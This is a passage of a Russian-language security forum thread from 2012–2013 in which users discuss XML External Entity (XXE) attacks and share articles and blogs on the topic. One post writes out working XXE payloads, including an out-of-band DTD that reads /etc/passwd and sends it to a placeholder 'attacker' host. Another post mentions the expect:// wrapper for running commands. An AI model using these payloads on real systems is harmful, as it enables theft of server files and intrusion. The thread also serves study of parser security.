Старый 06.03.2012, 14:58   #11
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

expect://ololo-commanding
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 15.11.2012, 19:21   #12
Qwazar
 
Регистрация: 09.07.2010
Сообщений: 376
Репутация: 154
По умолчанию

XXE - современная замена SQLi

Отличная статья:
http://blog.ptsecurity.ru/2012/11/xm...retrieval.html
__________________
Мой блог: http://qwazar.ru/.
Qwazar вне форума   Ответить с цитированием
Старый 16.11.2012, 16:39   #13
dr.Pilulkin
 
Регистрация: 04.01.2011
Сообщений: 22
Репутация: 9
По умолчанию

Не сохранилась у кого статья? На сайте pt потерли.
dr.Pilulkin вне форума   Ответить с цитированием
Старый 16.11.2012, 17:13   #14
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Сохранилась
profexer вне форума   Ответить с цитированием
Старый 26.11.2012, 22:42   #15
Qwazar
 
Регистрация: 09.07.2010
Сообщений: 376
Репутация: 154
По умолчанию

Чел много интересного на тему XXE пишет: http://www.agarri.fr/blog/index.html
__________________
Мой блог: http://qwazar.ru/.
Qwazar вне форума   Ответить с цитированием
Старый 27.11.2012, 00:09   #16
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

реально он XSLT копает в основном
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 22.12.2012, 12:17   #17
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Отличный XXE вектор из Японии причем 2009го года, когда мы все еще пешком ходили под XML-стол
http://d.hatena.ne.jp/teracc/20090718#1247918667

Код:
inject to XML:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker/test.dtd" >
<foo>&e1;</foo>

test.dtd:
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker/BLAH#%p1;'>">
%p2;
А также вариант резолва через атрибуты
http://d.hatena.ne.jp/teracc/20100703

Код:
<?xml version="1.0"?>
<!DOCTYPE data1 [
<!ENTITY pass SYSTEM "file:///etc/passwd">
]>
<data1 attr1="&pass;"></data1>
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 30.01.2013, 08:28   #18
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Я так понял, что стандартный xml парсер в php не обрабатывает entity. Только если специально написана функция обработчик (xml_set_external_entity_ref_handler), для парсинга.
Или все же можно включить валидацию и обработку entity?
zuzzz вне форума   Ответить с цитированием
Старый 30.01.2013, 13:11   #19
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

Цитата:
Сообщение от zuzzz Посмотреть сообщение
Я так понял, что стандартный xml парсер в php не обрабатывает entity. Только если специально написана функция обработчик (xml_set_external_entity_ref_handler), для парсинга.
Или все же можно включить валидацию и обработку entity?
SimpleXML обрабатывает, например.
Beched на форуме   Ответить с цитированием
Ответ

Метки
уязвимости, xml, xxe

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot